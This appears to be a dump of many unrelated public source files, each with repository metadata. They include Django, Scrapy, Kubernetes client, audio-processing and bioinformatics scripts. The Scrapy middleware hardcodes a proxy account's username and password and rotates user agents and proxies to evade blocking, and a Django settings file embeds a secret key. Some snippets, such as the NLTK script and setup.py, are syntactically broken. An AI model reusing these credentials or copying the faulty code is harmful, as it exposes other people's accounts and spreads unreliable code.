fa15303b08005facb3b231c2858e8ec9ba6c6a6b | 1e3a7750cc352060c9583daecf4358064df17e13 | /config.py | 04fb40826ae09c396aa2ce0733bbe0b67e4ac7e4 | [] | no_license | IronButterfly/nlpsysscripts | aa335a4a26733d8e10cce27f9cb64a18ef6b94bd | ccbe9f2bb2408aabb97cf3c72c541a6fd7562b41 | refs/heads/master | 2021-05-11T05:16:28.901829 | 2018-01-18T09:18:37 | 2018-01-18T09:18:37 | 117,957,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | consumer_key = ""
consumer_secret = ""
access_token = ""
access_token_secret = ""
Google_API = ""
AWS_ACCESS_KEY = ''
AWS_SECRET_ACCESS_KEY =''
| [
"noreply@github.com"
] | noreply@github.com |
fa79b596babef682f3b5914ffcc30d799205917c | 726ce8dddbb12af1662e002633bfe538ddf77708 | /PyOpenGL-2.0.2.01-py2.5-win32.egg/OpenGL/GL/SGIS/_multitexture.py | f56fd6209fbb3f8208e4edbfaed99bcb96da0c30 | [] | no_license | bopopescu/BCPy2000-1 | f9264bb020ba734be0bcc8e8173d2746b0f17eeb | 0f877075a846d17e7593222628e9fe49ab863039 | refs/heads/master | 2022-11-26T07:58:03.493727 | 2019-06-02T20:25:58 | 2019-06-02T20:25:58 | 282,195,357 | 0 | 0 | null | 2020-07-24T10:52:24 | 2020-07-24T10:52:24 | null | UTF-8 | Python | false | false | 284 | py | def __bootstrap__():
global __bootstrap__, __loader__, __file__
import sys, pkg_resources, imp
__file__ = pkg_resources.resource_filename(__name__,'_multitexture.pyd')
__loader__ = None; del __bootstrap__, __loader__
imp.load_dynamic(__name__,__file__)
__bootstrap__()
| [
"vanessa_kamara@my.uri.edu"
] | vanessa_kamara@my.uri.edu |
e4b13c967146163781fa18667db1e794d99cbd16 | 2967b898cc18f8011fa692f5ef49914f1fb02787 | /Lesson1/task7.py | 5c1845cbe4ba6399f821ee825cd344fb0142a6c9 | [] | no_license | EATataris/Python_Algorithms | 107a944282703766e9d929ea209d408f0102ba6b | 903f58159f8b0deb85b0cde1d1b1ce64e9b807c7 | refs/heads/main | 2023-03-28T02:20:54.915122 | 2021-03-16T17:09:10 | 2021-03-16T17:09:10 | 337,175,443 | 0 | 0 | null | 2021-03-16T17:09:11 | 2021-02-08T18:46:36 | Python | UTF-8 | Python | false | false | 1,613 | py | """
Задание 7.
Задание на закрепление навыков работы с деком
В рассмотренном на уроке листинге есть один недостаток
Приведенный код способен "обработать" только строку без пробелов, например, 'топот'
Но могут быть и такие палиндромы, как 'молоко делили ледоколом'
Вам нужно доработать программу так, чтобы она могла выполнить проверку на палиндром
и в таких строках (включающих пробелы)
"""
class DequeClass:
def __init__(self):
self.elems = []
def is_empty(self):
return self.elems == []
def add_to_front(self, elem):
self.elems.append(elem)
def add_to_rear(self, elem):
self.elems.insert(0, elem)
def remove_from_front(self):
return self.elems.pop()
def remove_from_rear(self):
return self.elems.pop(0)
def size(self):
return len(self.elems)
def pal_checker(string):
dc_obj = DequeClass()
for el in string.replace(' ', ''):
dc_obj.add_to_rear(el)
still_equal = True
while dc_obj.size() > 1 and still_equal:
first = dc_obj.remove_from_front()
last = dc_obj.remove_from_rear()
if first != last:
still_equal = False
return still_equal
print(pal_checker("топот"))
print(pal_checker("молоко делили ледоколом"))
| [
"emir-ali818@mail.ru"
] | emir-ali818@mail.ru |
d24af5aaad0fb6661854bcd9bfba843ba4aa8b38 | e2e454a3a10253e9b9647342b9a2c23685ca776f | /Django/Nexquality/migrations/0003_auto_20150324_1533.py | 293121ec24d5389b746a25da61a3f17eb64c6905 | [] | no_license | hboisselle/Nexquality-project | 728b6330e26f9c51b66af1467c8ab4295f4dac87 | 56e09388fd81a6256951a0d79d2ac3a5e023a5ac | refs/heads/master | 2021-01-10T18:46:31.441355 | 2015-04-08T13:44:33 | 2015-04-08T13:44:33 | 32,348,766 | 0 | 0 | null | 2015-05-01T14:37:49 | 2015-03-16T19:46:05 | Python | UTF-8 | Python | false | false | 1,107 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('Nexquality', '0002_auto_20150324_0951'),
]
operations = [
migrations.RemoveField(
model_name='projectuser',
name='joined_date',
),
migrations.AddField(
model_name='projectuser',
name='in_date',
field=models.DateField(default=datetime.datetime(2015, 3, 24, 19, 33, 51, 251805, tzinfo=utc)),
preserve_default=True,
),
migrations.AddField(
model_name='projectuser',
name='out_date',
field=models.DateField(null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='project',
name='start_date',
field=models.DateField(default=datetime.datetime(2015, 3, 24, 19, 33, 51, 250782, tzinfo=utc)),
preserve_default=True,
),
]
| [
"hugo.boisselle@gmail.com"
] | hugo.boisselle@gmail.com |
8e43d738be53b7f0e9be55751e8679abda1a206e | 4042cdc0abc903bfa6775af3a0ddc5e42059d7b7 | /DynamicProgramming/746. Min Cost Climbing Stairs.py | 599f8f7eb764ce121b044948a1a1c41b01d01045 | [] | no_license | adongxu/leetcode | 1b9fd77ebbe608e1fe19272a4fb7ec669a6d95b0 | 53857b3f54f42a1c1c13986a96537252bc97a4e2 | refs/heads/master | 2020-05-03T15:19:25.480537 | 2019-04-10T11:46:40 | 2019-04-10T11:46:40 | 178,702,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | """
746. Min Cost Climbing Stairs
Easy
On a staircase, the i-th step has some non-negative cost cost[i] assigned (0 indexed).
Once you pay the cost, you can either climb one or two steps. You need to find minimum cost to reach
the top of the floor, and you can either start from the step with index 0, or the step with index 1.
Example 1:
Input: cost = [10, 15, 20]
Output: 15
Explanation: Cheapest is start on cost[1], pay that cost and go to the top.
Example 2:
Input: cost = [1, 100, 1, 1, 1, 100, 1, 1, 100, 1]
Output: 6
Explanation: Cheapest is start on cost[0], and only step on 1s, skipping cost[3].
Note:
cost will have a length in the range [2, 1000].
Every cost[i] will be an integer in the range [0, 999].
"""
class Solution:
def minCostClimbingStairs(self, cost):
# 从2开始,累加最小的值
for i in range(2, len(cost)):
cost[i] += min(cost[i-1], cost[i-2])
# 最后一步可能从N-1或者n-2上去
return min(cost[-1], cost[-2])
# s= Solution()
# print(s.minCostClimbingStairs([1, 100, 1, 1, 1, 100, 1, 1, 100, 1])) | [
"1940240498@qq.com"
] | 1940240498@qq.com |
a2b0d9876b409aa030d60fd036b25a4a456322eb | 6bfda75657070e177fa620a43c917096cbd3c550 | /kubernetes/client/models/v1_quobyte_volume_source.py | c6a908ad799fb3900dd6206276075c0813fbba3b | [
"Apache-2.0"
] | permissive | don41382/client-python | 8e7e747a62f9f4fc0402eea1a877eab1bb80ab36 | e69d4fe204b98f7d7ee3ada3996b4f5fbceae5fe | refs/heads/master | 2021-01-19T23:15:50.172933 | 2017-04-18T18:00:48 | 2017-04-18T18:00:48 | 88,943,866 | 0 | 0 | null | 2017-04-21T05:19:52 | 2017-04-21T05:19:52 | null | UTF-8 | Python | false | false | 6,504 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1QuobyteVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, group=None, read_only=None, registry=None, user=None, volume=None):
"""
V1QuobyteVolumeSource - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'group': 'str',
'read_only': 'bool',
'registry': 'str',
'user': 'str',
'volume': 'str'
}
self.attribute_map = {
'group': 'group',
'read_only': 'readOnly',
'registry': 'registry',
'user': 'user',
'volume': 'volume'
}
self._group = group
self._read_only = read_only
self._registry = registry
self._user = user
self._volume = volume
@property
def group(self):
"""
Gets the group of this V1QuobyteVolumeSource.
Group to map volume access to Default is no group
:return: The group of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._group
@group.setter
def group(self, group):
"""
Sets the group of this V1QuobyteVolumeSource.
Group to map volume access to Default is no group
:param group: The group of this V1QuobyteVolumeSource.
:type: str
"""
self._group = group
@property
def read_only(self):
"""
Gets the read_only of this V1QuobyteVolumeSource.
ReadOnly here will force the Quobyte volume to be mounted with read-only permissions. Defaults to false.
:return: The read_only of this V1QuobyteVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1QuobyteVolumeSource.
ReadOnly here will force the Quobyte volume to be mounted with read-only permissions. Defaults to false.
:param read_only: The read_only of this V1QuobyteVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def registry(self):
"""
Gets the registry of this V1QuobyteVolumeSource.
Registry represents a single or multiple Quobyte Registry services specified as a string as host:port pair (multiple entries are separated with commas) which acts as the central registry for volumes
:return: The registry of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._registry
@registry.setter
def registry(self, registry):
"""
Sets the registry of this V1QuobyteVolumeSource.
Registry represents a single or multiple Quobyte Registry services specified as a string as host:port pair (multiple entries are separated with commas) which acts as the central registry for volumes
:param registry: The registry of this V1QuobyteVolumeSource.
:type: str
"""
if registry is None:
raise ValueError("Invalid value for `registry`, must not be `None`")
self._registry = registry
@property
def user(self):
"""
Gets the user of this V1QuobyteVolumeSource.
User to map volume access to Defaults to serivceaccount user
:return: The user of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._user
@user.setter
def user(self, user):
"""
Sets the user of this V1QuobyteVolumeSource.
User to map volume access to Defaults to serivceaccount user
:param user: The user of this V1QuobyteVolumeSource.
:type: str
"""
self._user = user
@property
def volume(self):
"""
Gets the volume of this V1QuobyteVolumeSource.
Volume is a string that references an already created Quobyte volume by name.
:return: The volume of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._volume
@volume.setter
def volume(self, volume):
"""
Sets the volume of this V1QuobyteVolumeSource.
Volume is a string that references an already created Quobyte volume by name.
:param volume: The volume of this V1QuobyteVolumeSource.
:type: str
"""
if volume is None:
raise ValueError("Invalid value for `volume`, must not be `None`")
self._volume = volume
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"mehdy@google.com"
] | mehdy@google.com |
bbfc2f22e37ac6ad2ddccc7df2a64d1d0416ba61 | b81e6271fd8fcf8696c90383d4358862da287ebf | /setup.py | 506c00fb603e59453072db52b0c92920987a20a3 | [
"MIT"
] | permissive | PandeKalyani95/Wafer_Project | 20d3aac9ad9585b07fffa0520f70d90b164f8dab | 915d8febca6107019866a0d63963aa66bf478526 | refs/heads/main | 2023-04-07T11:48:47.394335 | 2021-04-13T11:31:46 | 2021-04-13T11:31:46 | 357,197,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 221 | py | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='It's a wafer Ml project using mlops',
author='Kalyani0395',
license='MIT',
)
| [
"kalyanipande95@gmail.com"
] | kalyanipande95@gmail.com |
2467704279934bd40ea505eb40107f96ac59b745 | 1648f1205dad75927dc7b3be58d8c1ce947b5dcf | /blog/migrations/0002_auto_20180113_1737.py | 2127c0a5d4b1a5ed42ae1ec1ec394c27ddab9803 | [
"MIT"
] | permissive | rapacheco/blog | 8efcbc8199d157a4450945261694f2065c864bc6 | 1875ac22faf25834ccb8f233470efa96acd06a67 | refs/heads/master | 2020-03-18T04:47:50.718923 | 2018-05-21T18:11:47 | 2018-05-21T18:11:47 | 134,306,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-13 22:37
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='create_date',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 13, 22, 37, 34, 618974, tzinfo=utc)),
),
migrations.AlterField(
model_name='post',
name='create_date',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 13, 22, 37, 34, 617470, tzinfo=utc)),
),
]
| [
"rapachecobeiro@hotmail.com"
] | rapachecobeiro@hotmail.com |
b2ab8d47998ea4e78f6b52de16d4b8b57ba4020a | cd052f960846ea33e22abdded3106fb492f16c31 | /爬虫项目/code11/Tencent/Tencent/middlewares.py | f313fa007a063eec3e1f4f43302226f7dbe1aa01 | [] | no_license | byst4nder/his_spider | 2d96457b70894c36506e8061d8a3201ac337a5d0 | a51e31acff41292e568ac22b0e213e6cb48218fa | refs/heads/master | 2020-07-21T12:06:28.952083 | 2019-09-06T14:25:58 | 2019-09-06T14:25:58 | 206,857,595 | 1 | 0 | null | 2019-09-06T19:04:02 | 2019-09-06T19:04:02 | null | UTF-8 | Python | false | false | 1,284 | py | #coding:utf-8
import random
import requests
from fake_useragent import UserAgent
from settings import USER_AGENT_LIST
class RandomUserAgentMiddleware(object):
def __init__(self):
self.ua_obj = UserAgent()
def process_request(self, request, spider):
#user_agent = random.choice(USER_AGENT_LIST)
user_agent = self.ua_obj.random
request.headers["User-Agent"] = user_agent
print('---' * 10)
print(request.headers)
# 在中间件里不需要写return操作
# return request
class RandomProxyMiddleware(object):
def __init__(self):
self.proxy_url = "http://kps.kdlapi.com/api/getkps/?orderid=914194268627142&num=1&pt=1&sep=1"
# 获取代理服务器里提供的proxy
self.proxy_list = [requests.get(self.proxy_url).content]
self.count = 0
def process_request(self, request, spider):
if self.count < 20:
proxy = random.choice(self.proxy_list)
#http://47.99.65.91:16818
# http://maozhaojun:ntkn0npx@47.99.65.91:16818
request.meta['proxy'] = "http://maozhaojun:ntkn0npx@" + proxy
self.count += 1
else:
self.proxy_list = [requests.get(self.proxy_url).content]
self.count = 0
| [
"mac@macdeMacBook-Pro.local"
] | mac@macdeMacBook-Pro.local |
b212ce15f5e798b7aacdaec1a2404adcfb12f4cf | 1ea7ef2dd05a6cdee070af9f801ec5c2e4637dd0 | /Python/audioPassEnergy.py | 7b63a5b5c1ab516d66b8f847377e3aa939c4f86e | [] | no_license | qdbethune/pi_bois | 841557d72c9fe876167351be4ee4ad45253c3b60 | 10c05985794aa6befaf483b182b3d3b2dba18ca5 | refs/heads/master | 2020-04-01T03:40:18.728398 | 2018-10-14T13:28:10 | 2018-10-14T13:28:10 | 152,831,368 | 0 | 2 | null | 2018-10-13T17:31:13 | 2018-10-13T03:29:25 | C++ | UTF-8 | Python | false | false | 2,824 | py |
import essentia
from essentia.streaming import *
def audioPassEnergy ():
"""Program to test the various audio processing capabilities of Essentia"""
# Load audio in mono using MonoLoader default parameters
print("Enter input audio file path:")
loader = MonoLoader(filename=input())
# Cuts audio into discrete frames
lowCutter = FrameCutter(frameSize = 1024, hopSize = 512)
lowmidCutter = FrameCutter(frameSize = 1024, hopSize = 512)
highmidCutter = FrameCutter(frameSize = 1024, hopSize = 512)
highCutter = FrameCutter(frameSize = 1024, hopSize = 512)
# Low Pass filter (cutoff > 256hz)
lowFilter = LowPass(cutoffFrequency= 256)
# Low-Mid Pass filter (256 - 1024hz)
lowmidFilter = BandPass(cutoffFrequency= 256, bandwidth=768)
# High-Mid Pass filter (1024 - 4096hz)
highmidFilter = BandPass(cutoffFrequency= 1024, bandwidth=3072)
# High Pass filter (cutoff < 4096hz)
highFilter = HighPass(cutoffFrequency= 4096)
# Fast Fourier Transform Magnitudes
lowSpec = Spectrum()
lowmidSpec = Spectrum()
highmidSpec = Spectrum()
highSpec = Spectrum()
# Energy value
lowEnergy = Energy()
lowmidEnergy = Energy()
highmidEnergy = Energy()
highEnergy = Energy()
# Files for data output
lowout = FileOutput(filename = './Evalues/lowOutput')
lowmidout = FileOutput(filename = './Evalues/lowmidOutput')
highmidout = FileOutput(filename = './Evalues/highmidOutput')
highout = FileOutput(filename = './Evalues/highOutput')
# Duration of audio file in seconds
duration = Duration()
durationOut = FileOutput(filename= './Evalues/fileDuration')
loader.audio >> duration.signal
duration.duration >> durationOut
# Data flow to low filter
loader.audio >> lowFilter.signal
lowFilter.signal >> lowCutter.signal
lowCutter.frame >> lowSpec.frame
lowSpec.spectrum >> lowEnergy.array
lowEnergy.energy >> lowout
# Data flow to lowmid filter
loader.audio >> lowmidFilter.signal
lowmidFilter.signal >> lowmidCutter.signal
lowmidCutter.frame >> lowmidSpec.frame
lowmidSpec.spectrum >> lowmidEnergy.array
lowmidEnergy.energy >> lowmidout
# Data flow to highmid filter
loader.audio >> highmidFilter.signal
highmidFilter.signal >> highmidCutter.signal
highmidCutter.frame >> highmidSpec.frame
highmidSpec.spectrum >> highmidEnergy.array
highmidEnergy.energy >> highmidout
# Data flow to high filter
loader.audio >> highFilter.signal
highFilter.signal >> highCutter.signal
highCutter.frame >> highSpec.frame
highSpec.spectrum >> highEnergy.array
highEnergy.energy >> highout
# Run statement
essentia.run(loader)
def main():
audioPassEnergy()
if __name__ == "__main__":
main()
| [
"quentindbethune@gmail.com"
] | quentindbethune@gmail.com |
e2cf1b3f98dfcce63fb6f90e285c8220d9b48cf1 | c9f3c9c40a903ff3cfba533e993305a21fb9d058 | /Module 1/Chapter 1/nltk_scoring.py | 2e6e6afe187e2316ba3cc22d19e32890379b5a34 | [
"MIT"
] | permissive | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | 628e8ae954ce8ca135c1d8bc7bfbd70c53485cc1 | b34df3ceab78b3de29195a811696dcd06e77063a | refs/heads/master | 2023-02-05T15:17:55.574854 | 2023-01-30T09:56:54 | 2023-01-30T09:56:54 | 73,365,954 | 59 | 45 | null | null | null | null | UTF-8 | Python | false | false | 276 | py | >>>import sys
>>>import datetime
>>>import pickle
>>>import nltk
>>>nltk.download('punkt')
>>>for line in sys.stdin:
>>> line = line.strip()
>>> id, content= line.split('\t')
>>> tokens =nltk.word_tokenize(concat_all_text)
>>> print '\t'.join([id,content,tokens])
| [
"eganl@packtpub.com"
] | eganl@packtpub.com |
ea813d8e45f7b745a66a56a76d234e91e1964422 | 1e4c88fd3ebe722d5b917283841edd8ca398ad85 | /project-thesis/utils/helpers.py | 6f96bb57155ad375fa4b80547e4e217a5db569b4 | [] | no_license | mfkiwl/microgrid-mpc | 6de8ad1e4e59a5f0ebcdfd1a7846dab21c0aed88 | 88e3d4eeb28def3250c5769259854169565ec0df | refs/heads/master | 2023-03-20T19:47:00.758575 | 2021-03-18T14:01:28 | 2021-03-18T14:01:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,603 | py | import os
import shutil
import yaml
import pandas as pd
import numpy as np
from datetime import datetime
def parse_config():
"""
Parses and returns configfile as dict
"""
with open("./config.yml", "r") as f:
conf = yaml.load(f, Loader=yaml.FullLoader)
return conf
def create_folder(folderpath):
"""
Creates a folder
"""
if not os.path.exists(folderpath):
os.makedirs(folderpath)
def create_logs_folder(rootdir="./logs/", foldername=""):
"""
Creates a unique folder for the current run
"""
now = datetime.now()
time = now.strftime("%d.%m-%H:%M")
folderpath = rootdir + time + "-" + foldername + "/"
create_folder(folderpath)
# Save files in logs
files = ["./config.yml", "./main.py", "./solver.py"]
for f in files:
shutil.copyfile(f, folderpath + f)
return folderpath
def load_data():
""""""
conf = parse_config()
datafile = conf["datafile"]
data = pd.read_csv(datafile)
if "P1" in data.columns:
PL = (data.P1 + data.P2).to_numpy()
else:
PL = data.PL.to_numpy()
PV = data.PV.to_numpy()
if "Spot_pris" in data.columns:
grid_buy = grid_sell = data.Spot_pris.to_numpy()
else:
grid_buy = grid_sell = 1.5
if "PV_pred" not in data.columns:
PV_pred = PV.copy()
PL_pred = PL.copy()
else:
PV_pred = data.PV_pred.to_numpy()
PL_pred = data.PL_pred.to_numpy()
return PV, PV_pred, PL, PL_pred, grid_buy, grid_sell
def print_stats(PV, PL, PV_pred, PL_pred):
print(
"Predicted energy produced {}, predicted energy consumed {}".format(
np.sum(PV_pred), np.sum(PL_pred)
)
)
print(
"Actual energy produced {}, actual energy consumed {}".format(
np.sum(PV), np.sum(PL)
)
)
print("Predicted energy surplus/deficit:", np.sum(PV_pred) - np.sum(PL_pred))
print("Actual energy surplus/deficit:", np.sum(PV) - np.sum(PL))
def save_datafile(signals, names=[], logpath=None):
"""
Saves all signals in a csvfile called signals.csv
"""
if not logpath:
return
data = {}
for i in range(len(names)):
data[names[i]] = signals[i]
df = pd.DataFrame.from_dict(data, orient="index")
df = df.transpose()
df.to_csv(logpath + "signals.csv")
def check_constrain_satisfaction(u0, u1, u2, u3, pv, l):
residual = -u0 + u1 + u2 - u3 + pv - l
if residual > 1:
print("Constraint breached")
raise ValueError
if __name__ == "__main__":
parse_config() | [
"theodoth@stud.ntnu.no"
] | theodoth@stud.ntnu.no |
3e133354e43b89e7295c144c2f2a31d3288cbc8c | dc50cc0f2b08ece2a084ef2a63718594c5e41187 | /miverr/miverr/settings.py | 681b60b7bb99dba444a776b5fcf1abf4b87f3af3 | [] | no_license | mayank6/miverr | 7162aded9569e19df3035a22f953148f76afbbbe | 4be95a052b1ceae8529969ba6c09c560ca8fac5e | refs/heads/master | 2020-04-16T22:33:22.474530 | 2019-11-02T05:35:33 | 2019-11-02T05:35:33 | 165,973,281 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,749 | py | """
Django settings for miverr project.
Generated by 'django-admin startproject' using Django 1.11.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'htan(m@+@&*)f%@+$te@n)x0e*kh@)kp87vk7(^r2-jjjd8y8-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites', # new
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'miverrapp',
'users',
'widget_tweaks',
]
AUTH_USER_MODEL = 'users.CustomUser'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = (
"users.backend.EmailBackend",
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
SITE_ID = 1
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = True
ROOT_URLCONF = 'miverr.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'miverr.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
#'/var/www/static/',
]
STATIC_ROOT=os.path.join(BASE_DIR,'static_cdn')
MEDIA_ROOT=os.path.join(BASE_DIR,'media_cdn')
MEDIA_URL='/media/'
LOGIN_REDIRECT_URL = 'miverrapp:home'
LOGOUT_REDIRECT_URL = 'miverrapp:home'
| [
"chauhanmayank.621@gmail.com"
] | chauhanmayank.621@gmail.com |
e962b54ec262cb0e8a2b1e534a1193f362ac6c0e | 6e8d58340f2be5f00d55e2629052c0bbc9dcf390 | /lib/galaxy/datatypes/converters/fastqsolexa_to_fasta_converter.py | 1b68b3f6a2a340f24a5357a700a8e9995715fcc1 | [
"CC-BY-2.5",
"MIT"
] | permissive | JCVI-Cloud/galaxy-tools-prok | e57389750d33ac766e1658838cdb0aaf9a59c106 | 3c44ecaf4b2e1f2d7269eabef19cbd2e88b3a99c | refs/heads/master | 2021-05-02T06:23:05.414371 | 2014-03-21T18:12:43 | 2014-03-21T18:12:43 | 6,092,693 | 0 | 2 | NOASSERTION | 2020-07-25T20:38:17 | 2012-10-05T15:57:38 | Python | UTF-8 | Python | false | false | 1,781 | py | #!/usr/bin/env python
"""
convert fastqsolexa file to separated sequence and quality files.
assume each sequence and quality score are contained in one line
the order should be:
1st line: @title_of_seq
2nd line: nucleotides
3rd line: +title_of_qualityscore (might be skipped)
4th line: quality scores
(in three forms: a. digits, b. ASCII codes, the first char as the coding base, c. ASCII codes without the first char.)
Usage:
%python fastqsolexa_to_fasta_converter.py <your_fastqsolexa_filename> <output_seq_filename> <output_score_filename>
"""
import sys, os
from math import *
assert sys.version_info[:2] >= ( 2, 4 )
def stop_err( msg ):
sys.stderr.write( "%s" % msg )
sys.exit()
def __main__():
infile_name = sys.argv[1]
outfile = open( sys.argv[2], 'w' )
fastq_block_lines = 0
seq_title_startswith = ''
for i, line in enumerate( file( infile_name ) ):
line = line.rstrip() # eliminate trailing space and new line characters
if not line or line.startswith( '#' ):
continue
fastq_block_lines = ( fastq_block_lines + 1 ) % 4
line_startswith = line[0:1]
if fastq_block_lines == 1:
# line 1 is sequence title
if not seq_title_startswith:
seq_title_startswith = line_startswith
if seq_title_startswith != line_startswith:
stop_err( 'Invalid fastqsolexa format at line %d: %s.' %( i + 1, line ) )
read_title = line[ 1: ]
outfile.write( '>%s\n' % line[1:] )
elif fastq_block_lines == 2:
# line 2 is nucleotides
read_length = len( line )
outfile.write( '%s\n' % line )
else:
pass
outfile.close()
if __name__ == "__main__": __main__() | [
"root@ip-10-118-137-129.ec2.internal"
] | root@ip-10-118-137-129.ec2.internal |
87faeec665f0d69a553547f26f7095e0c623830a | e9f90d1ba4247c01f59c313179f1ef005885aaba | /vanhanh/migrations/0010_auto_20200104_1715.py | 6e0ed55c009a80889c24a9a18dc48d49d5ce393f | [] | no_license | hangockhue/khovanhanh | aef9ad39822902dea621512b97a485bc7d123bee | d5b3ca103abd4e20a80db8f43768a68d7adab9dc | refs/heads/master | 2022-04-17T18:02:11.526517 | 2020-04-20T08:06:11 | 2020-04-20T08:06:11 | 231,758,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,060 | py | # Generated by Django 2.1.7 on 2020-01-04 10:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('vanhanh', '0009_auto_20200104_1108'),
]
operations = [
migrations.CreateModel(
name='Grouptype',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='Loại chung')),
('highlight', models.BooleanField(default=True, verbose_name='Hiển thị title')),
],
options={
'verbose_name': 'Grouptype',
'verbose_name_plural': 'Nhóm sản phẩm',
},
),
migrations.AddField(
model_name='typeproduct',
name='group_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='vanhanh.Grouptype'),
),
]
| [
"khueha@nhaphangmy.com"
] | khueha@nhaphangmy.com |
c919cdecfb3d5c8c9d2226857ccc3bde41f66df1 | b61021e87abc2e075448d57e5402cdebcd12bd48 | /dogs/dog_app/backends.py | 6a9ef437525428c13532ea23458f0ee2dbca3df5 | [] | no_license | kapilarj/Dogs | 86bbb08f10d48603a03f095b596573e8484ae94b | 919ea5073e8ca656ffcab93d51b0e66d9dc56af9 | refs/heads/master | 2020-03-22T21:14:13.510952 | 2018-07-12T06:10:16 | 2018-07-12T06:10:16 | 140,669,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | py | from .models import MyUser
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import get_user_model
class EmailBackend(ModelBackend):
def authenticate(self, username=None, password=None, **kwargs):
try:
User = get_user_model()
user = User.objects.get(email=username)
